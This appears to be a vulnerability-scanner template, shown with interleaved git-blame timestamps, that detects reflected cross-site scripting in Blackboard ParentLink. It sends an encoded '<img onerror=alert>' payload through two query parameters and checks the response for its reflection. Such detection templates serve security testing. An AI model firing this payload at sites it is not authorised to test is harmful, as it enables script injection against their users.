2021-03-10 19:36:08 +00:00
id : parentlink-xss
info :
2022-09-23 17:53:08 +00:00
name : Blackboard - Cross-Site Scripting
2021-03-10 19:36:08 +00:00
author : r3naissance
2022-09-23 17:53:08 +00:00
severity : high
description : Blackboard contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-04-22 10:38:41 +00:00
reference :
- https://help.blackboard.com/Community_Engagement/Administrator/Release_Notes
2022-09-23 17:53:08 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2021-03-10 19:36:08 +00:00
tags : blackboard,parentlink,xss
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2021-03-10 19:36:08 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-03-10 19:36:08 +00:00
- method : GET
path :
2021-03-11 15:03:36 +00:00
- '{{BaseURL}}/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
- '{{BaseURL}}/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
2021-03-10 19:36:08 +00:00
matchers-condition : and
matchers :
- type : word
words :
- '<img src=c onerror=alert(8675309)>'
part : body
- type : word
words :
- "text/html"
part : header
- type : status
status :
2022-09-23 17:53:08 +00:00
- 200